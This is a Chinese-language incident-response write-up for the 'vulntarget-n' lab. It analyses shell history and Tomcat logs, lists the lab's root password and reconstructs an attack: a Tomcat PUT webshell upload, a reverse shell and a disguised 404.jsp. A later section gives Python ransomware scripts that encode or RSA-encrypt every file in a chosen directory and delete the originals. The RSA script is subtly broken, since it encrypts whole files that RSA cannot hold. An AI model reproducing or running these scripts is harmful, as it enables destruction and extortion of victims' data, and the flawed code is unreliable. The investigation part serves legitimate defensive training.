应急响应靶场之vulntarget-n
vulntarget-n
用户名密码:root/Vulntarget@123
一.分析history命令
1.先将历史命令导出
history > 1.txt
2.分析history
1)篡改网页
2)将木马文件进行伪装
3)创建公钥私钥,加密方式为rsa
4)拷贝公钥到指定目录,将该目录下文件进行勒索加密
二.找到加密私钥进行解密
find . -name *key*.pem #在根目录下全局搜索公钥
将公钥私钥以及加密文件内容放到rsa解密
注,将404.jsp文件进行解密后发现文件为jsp马。
三.检查日志
1.tomcat日志文件路径存放于 /opt/tomcat/logs
由于攻击行为可能存在上传木马行为,重点查看post、put请求下,状态码为200的请求内容。
tail -n 5000 localhost_access_log.2024-06-04.txt | grep "2*" | grep "PUT"
上传jsp马后,执行了whoami
4.漏洞复现
复习一下tomcat文件上传漏洞
put请求下上传一个jsp小马,使用蚁剑连接。
5.攻击过程
1.利用tomcat历史漏洞(文件上传漏洞)上传vulntarget.jsp马。
2.反弹shell拿到root权限。
3.将jsp马伪装成404.jsp文件。
4.创建勒索文件,使用rsa加密,生成公钥私钥。
5.使用python,对ROOT路径下的文件进行rsa加密。
6.删除加密脚本,做痕迹清除。
其他
1.了解重要配置文件
/opt/tomcat/conf/server.xml #该文件为tomcat配置文件,可以实现更改端口,设置虚拟主机,配置SSL等
2.勒索文件制作
1.制作公钥私钥
mkdir keys #创建一个文件夹,用于存放公钥私钥。
vim get_pem.py #编写公钥私钥生成脚本
python3 get_pem.py #运行脚本,生成公私钥
常见生成公私钥脚本如下:
import rsa
import os
# 确保 keys 文件夹存在
os.makedirs("./keys", exist_ok=True)
# 生成 RSA 密钥对
pub, priv = rsa.newkeys(2048) # 建议使用 2048 位密钥
# 保存公钥
try:
pub = pub.save_pkcs1()
with open("./keys/pubkey.pem", mode="wb") as file:
file.write(pub)
print("公钥保存成功:./keys/pubkey.pem")
except Exception as e:
print(f"保存公钥时出错:{e}")
# 保存私钥
try:
priv = priv.save_pkcs1()
with open("./keys/privkey.pem", mode="wb") as file:
file.write(priv)
print("私钥保存成功:./keys/privkey.pem")
except Exception as e:
print(f"保存私钥时出错:{e}")
2.准备加密工作
cp keys/pubkey.pem /opt/tomcat/webapps/ROOT #将公钥放到网页webapps目录下
vim flag.jsp #创建flag.jsp文件
vim encrypt_vulntarget.py #创建加密脚本,对当前目录下的jsp文件都进行加密
常见加密脚本如下:
##获取文件路径
def list(src):
res = []
for root, dirs, files in os.walk(src): #获取父目录,子目录,文件
for file in files:
# 获取文件所属目录
# print(root)
# 获取文件路径
res.append(os.path.join(root, file)) #把父目录和文件合成一个路径
return res
## 加密
def ran_encode(res):
for r in res:
# print(re)
with open(r, 'rb') as fp:
src = fp.read()
bs = base64.b64encode(src).decode() #读取并用base64加密
se = ''
for b in bs:
new = chr(ord(b) + 5) #转换成acsii码进行位移
se += new
# print(type(re))
os.remove(r)
name = '123'
with open(r+name, 'wb') as fp: #覆写
fp.write(se.encode())
## 解密
def ran_decode(res):
for r in res:
with open(r, 'r') as fp:
src = fp.read()
se = ''
for b in src:
new = chr(ord(b) - 5)
se += new
resp = base64.b64decode(se)
s=r[0:-3]
os.remove(r)
with open(s,'wb') as fp:
fp.write(resp)
path=r"需要勒索的目录,绝对路径"
def intes():
res=list(path)
ran_encode(res)
def outs():
src1 = list(path)
ran_decode(src1)
加解密常见脚本
##加密
def encrypt_file(file_path, public_key_path):
# 加载公钥
with open(public_key_path, "rb") as f:
public_key = rsa.PublicKey.load_pkcs1(f.read())
# 读取文件内容
with open(file_path, "rb") as f:
file_content = f.read()
# 加密文件内容
encrypted_content = rsa.encrypt(file_content, public_key)
# 保存加密后的文件
encrypted_file_path = file_path + ".enc"
with open(encrypted_file_path, "wb") as f:
f.write(encrypted_content)
print(f"文件已加密并保存到 {encrypted_file_path}")
return encrypted_file_path
# 示例:加密文件
encrypt_file("example.txt", "public_key.pem")
##解密
def decrypt_file(encrypted_file_path, private_key_path):
# 加载私钥
with open(private_key_path, "rb") as f:
private_key = rsa.PrivateKey.load_pkcs1(f.read())
# 读取加密后的文件内容
with open(encrypted_file_path, "rb") as f:
encrypted_content = f.read()
# 解密文件内容
decrypted_content = rsa.decrypt(encrypted_content, private_key)
# 保存解密后的文件
decrypted_file_path = encrypted_file_path.replace(".enc", "_decrypted")
with open(decrypted_file_path, "wb") as f:
f.write(decrypted_content)
print(f"文件已解密并保存到 {decrypted_file_path}")
# 示例:解密文件
decrypt_file("example.txt.enc", "private_key.pem")
应急响应靶场之vulntarget-n的更多相关文章
- 一些关于Linux入侵应急响应的碎碎念
近半年做了很多应急响应项目,针对黑客入侵.但疲于没有时间来总结一些常用的东西,寄希望用这篇博文分享一些安全工程师在处理应急响应时常见的套路,因为方面众多可能有些杂碎. 个人认为入侵响应的核心无外乎四个 ...
- Linux安全事件应急响应排查方法总结
Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...
- Windows应急响应常识
Windows 应急响应 常见事件ID 1102 清理审计日志 4624 账号登陆成功 4625 账号登陆失败 4672 授予特殊权限 4720 创建用户 4726 删除用户 4728 将成员添加到启 ...
- Window应急响应(五):ARP病毒
0x00 前言 ARP病毒并不是某一种病毒的名称,而是对利用arp协议的漏洞进行传播的一类病毒的总称,目前在局域网中较为常见.发作的时候会向全网发送伪造的ARP数据包,严重干扰全网的正常运行,其危害甚 ...
- Window应急响应(一):FTP暴力破解
0x00 前言 FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护.日常源码备份等.如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传 ...
- Window应急响应(二):蠕虫病毒
0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...
- Window应急响应(三):勒索病毒
0x00 前言 勒索病毒,是一种新型电脑病毒,主要以邮件.程序木马.网页挂马的形式进行传播.该病毒性质恶劣.危害极大,一旦感染将给用户带来无法估量的损失.这种病毒利用各种加密算法对文件进行加密,被 ...
- Window应急响应(四):挖矿病毒
0x00 前言 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...
- windows应急响应入侵排查思路
0x00 前言 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解 ...
- Linux应急响应入侵排查思路
0x00 前言 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解 ...
随机推荐
- 离线yum安装k8s(直接yum安装k8s)快速部署
问题:如何在没有离线环境上服务器yum安装k8s环境? 环境:准备一台互联网的服务器+离线的服务器 写的比较简便........ 1.互联网服务操作添加阿里云YUM的软件源 cat > /etc ...
- mybatis-plus逻辑删除不生效的解决办法
我们在使用mybatis-plus时,一般设备逻辑删除是非常简单的,基本上在yaml等配置文件中做一下配置.然后在字段上注解@TableLogic就可以了.有不清楚的,可以参考https://www. ...
- Could not install packages due to an OSError: ("Connection broken: ConnectionResetError(10054, '远程主机强迫关闭 了一个现有的连接。', None, 10054, None)",
今天安装微软AI量化投资平台Qlib遇到报错 ERROR: Could not install packages due to an OSError: ("Connection broken ...
- 长连接网关技术专题(六):石墨文档单机50万WebSocket长连接架构实践
本文由石墨文档技术杜旻翔分享,原题"石墨文档 Websocket 百万长连接技术实践",有修订. 1.引言 在石墨文档的部分业务中,例如文档分享.评论.幻灯片演示和文档表格跟随等场 ...
- [LC515]在每个树的行中找最大值
题目内容 题目分析 这是一道典型的树结构遍历题,可以使用层序遍历(BFS)或者(DFS)进行解题. 在BFS中,使用队列结构遍历树的每一层并维护每层的最大值. 在DFS中,由于并不是一层一层的去访问树 ...
- ESP8266 wifi模块+CH340烧录板安装使用运行教程
硬件准备 ESP8266-01S 模块 USB转TTL烧录板(CH340) LED灯(建议使用3.3V LED) 220Ω电阻(LED限流) 面包板和跳线若干 我的是这样的不用接线,其他的参考 ESP ...
- 【源码】Kafka订制协议如何处理粘拆包
前言 在上一篇随笔中,我们探讨了如何使用 Netty 处理自定义协议中的粘包和拆包问题.Netty 提供了高度封装的 API,帮助开发者轻松应对这一挑战,因此很多人都对其解决方案非常熟悉. 但如果我们 ...
- ASP6.0 (VB) 获取目录下所有图片文件
<% 'Desc : ASP6.0 (VB) 获取目录下所有图片文件 'by : wgscd 'date : 2024-2-1 dim c_path c_path=Server.MapPath( ...
- SQL只取日期的年月日部分
方法一: select CONVERT(varchar, getdate(), 120 ) 2004-09-12 11:06:08 select replace(replace(replace(CON ...
- Superset 稀奇古怪的bug
1.filterbox 及 native filter 等组件里面,日期筛选器下拉框,显示的不是日期格式,而是时间戳格式,如: 解决方法: 修改superset\utils\core.py 里面的js ...